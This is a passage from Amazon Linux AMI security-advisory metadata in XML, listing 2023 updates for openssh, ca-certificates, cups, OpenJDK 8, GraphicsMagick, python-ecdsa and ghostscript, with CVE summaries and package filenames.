release="22.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-7.4p1-22.78.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="22.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-7.4p1-22.78.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="22.78.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-7.4p1-22.78.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="22.78.amzn1" epoch="0" 
arch="i686"><filename>Packages/openssh-debuginfo-7.4p1-22.78.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="22.78.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-7.4p1-22.78.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="22.78.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-7.4p1-22.78.amzn1.i686.rpm</filename></package><package name="openssh-server" version="7.4p1" release="22.78.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-7.4p1-22.78.amzn1.i686.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="22.78.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-cavs-7.4p1-22.78.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.22.78.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.22.78.amzn1.i686.rpm</filename></package><package name="openssh" version="7.4p1" release="22.78.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-7.4p1-22.78.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1795</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1795: important priority package update for ca-certificates</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-32803:
An initial fix in Amazon Linux ca-certificates package relating to CVE-2022-23491 did not properly remove root certificates from TrustCor from the root store.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32803" title="" id="CVE-2023-32803" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ca-certificates" version="2018.2.22" release="65.1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/ca-certificates-2018.2.22-65.1.30.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1796</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1796: medium priority package update for cups</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-32324:
OpenPrinting CUPS is an open source printing system. In versions 2.4.2 and prior, a heap buffer overflow vulnerability would allow a remote attacker to launch a denial of service (DoS) attack. A buffer overflow vulnerability in the function `format_log_line` could allow remote attackers to cause a DoS on the affected system. Exploitation of the vulnerability can be triggered when the configuration file `cupsd.conf` sets the value of `loglevel` to `DEBUG`. No known patches or workarounds exist at time of publication.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32324" title="" id="CVE-2023-32324" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cups" version="1.4.2" release="67.23.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-1.4.2-67.23.amzn1.x86_64.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.23.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-lpd-1.4.2-67.23.amzn1.x86_64.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.23.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-libs-1.4.2-67.23.amzn1.x86_64.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.23.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-devel-1.4.2-67.23.amzn1.x86_64.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.23.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-debuginfo-1.4.2-67.23.amzn1.x86_64.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.23.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-php-1.4.2-67.23.amzn1.x86_64.rpm</filename></package><package name="cups" version="1.4.2" release="67.23.amzn1" epoch="1" arch="i686"><filename>Packages/cups-1.4.2-67.23.amzn1.i686.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.23.amzn1" epoch="1" arch="i686"><filename>Packages/cups-devel-1.4.2-67.23.amzn1.i686.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.23.amzn1" epoch="1" arch="i686"><filename>Packages/cups-debuginfo-1.4.2-67.23.amzn1.i686.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.23.amzn1" epoch="1" arch="i686"><filename>Packages/cups-lpd-1.4.2-67.23.amzn1.i686.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.23.amzn1" epoch="1" 
arch="i686"><filename>Packages/cups-php-1.4.2-67.23.amzn1.i686.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.23.amzn1" epoch="1" arch="i686"><filename>Packages/cups-libs-1.4.2-67.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1797</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1797: medium priority package update for java-1.8.0-openjdk</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-22049:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 8u371, 8u371-perf, 11.0.19, 17.0.7, 20.0.1; Oracle GraalVM Enterprise Edition: 20.3.10, 21.3.6, 22.3.2; Oracle GraalVM for JDK: 17.0.7 and 20.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2023-22045:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u371, 8u371-perf, 11.0.19, 17.0.7, 20.0.1; Oracle GraalVM Enterprise Edition: 20.3.10, 21.3.6, 22.3.2; Oracle GraalVM for JDK: 17.0.7 and 20.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).
CVE-2023-22043:
Vulnerability in Oracle Java SE (component: JavaFX). The supported version that is affected is Oracle Java SE: 8u371. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N).
CVE-2023-21968:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2023-21967:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
CVE-2023-21954:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).
CVE-2023-21939:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2023-21938:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.8, 21.3.4 and 22.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2023-21937:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Networking). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21937" title="" id="CVE-2023-21937" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21938" title="" id="CVE-2023-21938" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21939" title="" id="CVE-2023-21939" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21954" title="" id="CVE-2023-21954" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21967" title="" id="CVE-2023-21967" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21968" title="" id="CVE-2023-21968" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22043" title="" id="CVE-2023-22043" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22045" title="" id="CVE-2023-22045" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22049" title="" id="CVE-2023-22049" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.382.b05-1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.382.b05-1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.382.b05-1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.382.b05-1.78.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.382.b05-1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.382.b05-1.78.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.382.b05-1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.78.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.382.b05-1.78.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.382.b05-1.78.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.382.b05-1.78.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.382.b05-1.78.amzn1.i686.rpm</filename></package><package 
name="java-1.8.0-openjdk-src" version="1.8.0.382.b05" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.382.b05-1.78.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1798</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1798: important priority package update for java-1.8.0-openjdk</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-21930:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21930" title="" id="CVE-2023-21930" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.372.b07-1.76.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.372.b07-1.76.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.372.b07-1.76.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.76.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.372.b07-1.76.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.372.b07-1.76.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.372.b07-1.76.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.372.b07-1.76.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.372.b07" 
release="1.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.76.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.372.b07-1.76.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.372.b07-1.76.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.372.b07-1.76.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.372.b07-1.76.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.372.b07" release="1.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.372.b07-1.76.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1799</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1799: important priority package update for GraphicsMagick</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-1270:
In GraphicsMagick, a heap buffer overflow was found when parsing MIFF.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1270" title="" id="CVE-2022-1270" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-debuginfo" version="1.3.32" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.32-1.17.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-doc" version="1.3.32" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.32-1.17.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.32" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.32-1.17.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.32" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.32-1.17.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.32" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.32-1.17.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.32" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.32-1.17.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.32" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.32-1.17.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.32" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.32-1.17.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.32" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.32-1.17.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.32" release="1.17.amzn1" 
epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.32-1.17.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.32" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.32-1.17.amzn1.i686.rpm</filename></package><package name="GraphicsMagick" version="1.3.32" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.32-1.17.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.32" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.32-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1800</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1800: important priority package update for python-ecdsa</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-14859:
A flaw was found in all python-ecdsa versions before 0.13.3, where it did not correctly verify whether signatures used DER encoding. Without this verification, a malformed signature could be accepted, making the signature malleable. Without proper verification, an attacker could use a malleable signature to create false transactions.
CVE-2019-14853:
An error-handling flaw was found in python-ecdsa before version 0.13.3. During signature decoding, malformed DER signatures could raise unexpected exceptions (or no exceptions at all), which could lead to a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14853" title="" id="CVE-2019-14853" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14859" title="" id="CVE-2019-14859" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-ecdsa" version="0.11" release="3.4.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-ecdsa-0.11-3.4.amzn1.noarch.rpm</filename></package><package name="python26-ecdsa" version="0.11" release="3.4.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-ecdsa-0.11-3.4.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1801</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1801: medium priority package update for ghostscript</title><issued date="2023-08-17 11:39:00" /><updated date="2023-08-23 02:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-38559:
A buffer overflow flaw was found in base/gdevdevn.c:1973 in devn_pcx_write_rle() in ghostscript. This issue may allow a local attacker to cause a denial of service via outputting a crafted PDF file for a DEVN device with gs.
